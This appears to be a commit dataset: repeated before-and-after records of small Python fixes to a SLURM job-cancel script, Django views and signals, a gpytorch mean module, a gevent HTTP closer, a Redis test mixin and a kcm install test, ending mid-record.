### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(current_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
Kill multiple chains at once.
|
Kill multiple chains at once.
|
Python
|
mit
|
nyu-mll/spinn,nyu-mll/spinn,nyu-mll/spinn
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
Kill multiple chains at once.
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(current_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
<commit_before>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
<commit_msg>Kill multiple chains at once.<commit_after>
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(current_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
Kill multiple chains at once.
import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(current_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
<commit_before>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain]
CURRENT_JOB = sys.argv[1]
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
to_kill = [CURRENT_JOB]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
<commit_msg>Kill multiple chains at once.<commit_after>import subprocess
import sys
import getpass
### Kill a job and its chain of dependents (as created by sbatch_submit).
### Usage: python sbatch_cancel.py [Name of first running job in chain] [Name of first running job in chain for a second chain] ...
USER = getpass.getuser()
lines = subprocess.check_output(['squeue', '-u', USER, '-o', '"%.8A %.20E"'])
lines = lines.split('\n')
lines.sort()
for current_job in sys.argv[1].split():
if len(current_job) < 5:
continue
to_kill = [current_job]
for line in lines:
s = line.split()
if (len(s) > 0) and (to_kill[-1] in s[2]):
to_kill.append(s[1])
subprocess.call(['scancel'] + to_kill)
|
994ef988e966499dbc5c7298a201105517692fc7
|
source/views/views.py
|
source/views/views.py
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
Add extra line to separate functions
|
Add extra line to separate functions
|
Python
|
mit
|
jeremyrea/caterblu,jeremyrea/caterblu,jeremyrea/caterblu,jeremyrea/caterblu
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
Add extra line to separate functions
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
<commit_before>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
<commit_msg>Add extra line to separate functions<commit_after>
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
Add extra line to separate functions
import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
<commit_before>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
<commit_msg>Add extra line to separate functions<commit_after>import json
from django.shortcuts import render
from django.http import HttpResponse
from source.forms.search_form import SearchForm
from source.controllers.cater_controller import CaterController
def index(request):
if request.method == 'GET':
form = SearchForm(request.GET)
if form.is_valid():
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
try:
data = cater_controller.get_data()
return render(request, 'index.html', {'status': 200, 'form': form, 'data': data})
except ValueError:
return render(request, 'index.html', {'status': 204, 'form': form})
else:
form = SearchForm()
return render(request, 'index.html', {'status': 200, 'form': form})
def price(request):
if request.method == 'GET':
title = request.GET.__getitem__('title')
country = request.GET.__getitem__('country')
cater_controller = CaterController(title, country)
price = cater_controller.get_price()
return HttpResponse(json.dumps(price, default=lambda p: p.__dict__))
|
cef6f3cce4a942bea53d6bae639dcd48d680d05a
|
gpytorch/means/linear_mean.py
|
gpytorch/means/linear_mean.py
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
Fix LinearMean bias when bias=False
|
Fix LinearMean bias when bias=False
|
Python
|
mit
|
jrg365/gpytorch,jrg365/gpytorch,jrg365/gpytorch
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
Fix LinearMean bias when bias=False
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
<commit_before>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
<commit_msg>Fix LinearMean bias when bias=False<commit_after>
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
Fix LinearMean bias when bias=False
#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
<commit_before>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
<commit_msg>Fix LinearMean bias when bias=False<commit_after>#!/usr/bin/env python3
import torch
from .mean import Mean
class LinearMean(Mean):
def __init__(self, input_size, batch_shape=torch.Size(), bias=True):
super().__init__()
self.register_parameter(name='weights',
parameter=torch.nn.Parameter(torch.randn(*batch_shape, input_size, 1)))
if bias:
self.register_parameter(name='bias', parameter=torch.nn.Parameter(torch.randn(*batch_shape, 1)))
else:
self.bias = None
def forward(self, x):
res = x.matmul(self.weights).squeeze(-1)
if self.bias is not None:
res = res + self.bias
return res
|
f00fd0fde81a340cf00030bbe2562b8c878edd41
|
src/yawf/signals.py
|
src/yawf/signals.py
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
Add new arg in message_handled signal definition
|
Add new arg in message_handled signal definition
|
Python
|
mit
|
freevoid/yawf
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
Add new arg in message_handled signal definition
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
<commit_before>from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
<commit_msg>Add new arg in message_handled signal definition<commit_after>
|
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
Add new arg in message_handled signal definition
from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
<commit_before>from django.dispatch import Signal
message_handled = Signal(providing_args=['message', 'instance', 'new_revision'])
<commit_msg>Add new arg in message_handled signal definition<commit_after>from django.dispatch import Signal
message_handled = Signal(
providing_args=['message', 'instance', 'new_revision', 'transition_result']
)
|
e1529a2071779dc7f657c3bbb370f3c2c5fb240e
|
HTTPCloser.py
|
HTTPCloser.py
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
Fix typoe items vs items()
|
Fix typoe items vs items()
|
Python
|
mit
|
c00w/bitHopper,c00w/bitHopper
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
Fix typoe items vs items()
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
<commit_before>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
<commit_msg>Fix typoe items vs items()<commit_after>
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
Fix typoe items vs items()
import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
<commit_before>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items:
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
<commit_msg>Fix typoe items vs items()<commit_after>import time, gevent
seen = None
def used(url, http_pool):
__patch()
seen[(url, http_pool)] = time.time()
def __patch():
global seen
if seen is None:
seen = {}
gevent.spawn(clean)
def clean():
while True:
for k, last_seen in seen.items():
if time.time()-last_seen < 0.3:
continue
url, pool = k
pool.request(url, 'GET', headers = {'Connection':'close'})
gevent.sleep(0.3)
|
5a76457e2b9596ad3497b0145410a2f4090a5c54
|
tests/mixins.py
|
tests/mixins.py
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
Add annotation required for mypy
|
Add annotation required for mypy
|
Python
|
bsd-3-clause
|
thread/django-lightweight-queue,thread/django-lightweight-queue
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
Add annotation required for mypy
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
<commit_before>class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
<commit_msg>Add annotation required for mypy<commit_after>
|
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
Add annotation required for mypy
class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
<commit_before>class RedisCleanupMixin(object):
client = None
prefix = None
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
<commit_msg>Add annotation required for mypy<commit_after>class RedisCleanupMixin(object):
client = None
prefix = NotImplemented # type: str
def setUp(self):
super(RedisCleanupMixin, self).setUp()
self.assertIsNotNone(self.client, "Need a redis client to be provided")
def tearDown(self):
root = '*'
if self.prefix is not None:
root = '{}*'.format(self.prefix)
keys = self.client.keys(root)
for key in keys:
self.client.delete(key)
super(RedisCleanupMixin, self).tearDown()
|
e281c9ab30acdbc60439a143557efdeaf4757e1b
|
tests/integration/test_kcm_install.py
|
tests/integration/test_kcm_install.py
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
Remove the installed kcm binary after int tests.
|
Remove the installed kcm binary after int tests.
|
Python
|
apache-2.0
|
Intel-Corp/CPU-Manager-for-Kubernetes,Intel-Corp/CPU-Manager-for-Kubernetes,Intel-Corp/CPU-Manager-for-Kubernetes
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
Remove the installed kcm binary after int tests.
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
